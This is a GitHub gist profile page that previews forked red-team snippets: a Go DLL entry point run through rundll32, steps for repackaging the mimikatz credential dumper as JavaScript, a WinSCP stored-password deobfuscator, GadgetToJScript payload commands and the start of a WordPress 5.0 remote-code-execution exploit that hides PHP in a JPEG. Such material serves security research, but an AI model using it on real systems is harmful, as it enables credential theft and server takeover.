Skip to content

Instantly share code, notes, and snippets.

View alacerda's full-sized avatar
🎯
Focusing

ifundef alacerda

🎯
Focusing
View GitHub Profile
@alacerda
alacerda / dllmain.go
Created March 16, 2022 03:21 — forked from NaniteFactory/dllmain.go
An implementation example of DllMain() entrypoint with Golang. $ go build --buildmode=c-shared -o my.dll && rundll32.exe my.dll Test
package main
//#include "dllmain.h"
import "C"
@alacerda
alacerda / Instructions-to-mimikatz-js.txt
Created May 29, 2020 19:33 — forked from pljoel/Instructions-to-mimikatz-js.txt
mimikatz 2.1.1 in javascript
It is basically a wrap of the following projects:
- mimikatz (https://github.com/gentilkiwi/mimikatz)
- mimikatz in .NET by Casey Smith (https://gist.github.com/caseysmithrc/87f6572547f633f13a8482a0c91fb7b7)
Updated from 2.0.0 to 2.1.1 (https://gist.github.com/pljoel/410eeebcaf118b9ac8b8f2b40fd5e863)
- DotNetToJScript (https://github.com/tyranid/DotNetToJScript)
INSTRUCTIONS:
1. Grab the latest release of mimikatz: https://github.com/gentilkiwi/mimikatz/releases
2. a) Uncomment the building lines from Casey's project in Delivery.Program.Main() (You may want to comment the Exec() line though)
b) It is going to produce a file.b64, so copy it's content and replace Delivery.Package.file string by it
@alacerda
alacerda / winscp-deobfuscator.py
Created May 29, 2020 19:31 — forked from jojonas/winscp-deobfuscator.py
WinSCP deobfuscator
import argparse
class Decrypter:
SIMPLE_STRING = "0123456789ABCDEF"
SIMPLE_MAGIC = 0xA3
def __init__(self, password):
self.data = password
def next(self):
@alacerda
alacerda / GadgetToJScript Command Reference
Created February 20, 2020 17:29 — forked from 3xpl01tc0d3r/GadgetToJScript Command Reference
GadgetToJScript Code
# Command to generate HTA code using GadgetsToJScript
GadgetToJScript.exe -w hta
# Command to generate JS code using GadgetsToJScript
GadgetToJScript.exe -w js
# Command to generate VBS code using GadgetsToJScript
GadgetToJScript.exe -w vbs
# Command to generate VBA code using GadgetsToJScript
@alacerda
alacerda / wordpress-rce.js
Created March 13, 2019 13:29 — forked from allyshka/wordpress-rce.js
WordPress <= 5.0 exploit code for CVE-2019-8942 & CVE-2019-8943
var wpnonce = '';
var ajaxnonce = '';
var wp_attached_file = '';
var imgurl = '';
var postajaxdata = '';
var post_id = 0;
var cmd = '<?php phpinfo();/*';
var cmdlen = cmd.length
var payload = '\xff\xd8\xff\xed\x004Photoshop 3.0\x008BIM\x04\x04'+'\x00'.repeat(5)+'\x17\x1c\x02\x05\x00\x07PAYLOAD\x00\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00`\x00`\x00\x00\xff\xdb\x00C\x00\x06\x04\x05\x06\x05\x04\x06\x06\x05\x06\x07\x07\x06\x08\x0a\x10\x0a\x0a\x09\x09\x0a\x14\x0e\x0f\x0c\x10\x17\x14\x18\x18\x17\x14\x16\x16\x1a\x1d%\x1f\x1a\x1b#\x1c\x16\x16 , #&\x27)*)\x19\x1f-0-(0%()(\xff\xc0\x00\x0b\x08\x00\x01\x00\x01\x01\x01\x11\x00\xff\xc4\x00\x14\x00\x01'+'\x00'.repeat(15)+'\x08\xff\xc4\x00\x14\x10\x01'+'\x00'.repeat(16)+'\xff\xda\x00\x08\x01\x01\x00\x00?\x00T\xbf\xff\xd9';
var img = payload.replace('\x07PAYLOAD', String.fromCharCode(cmdlen) + cmd);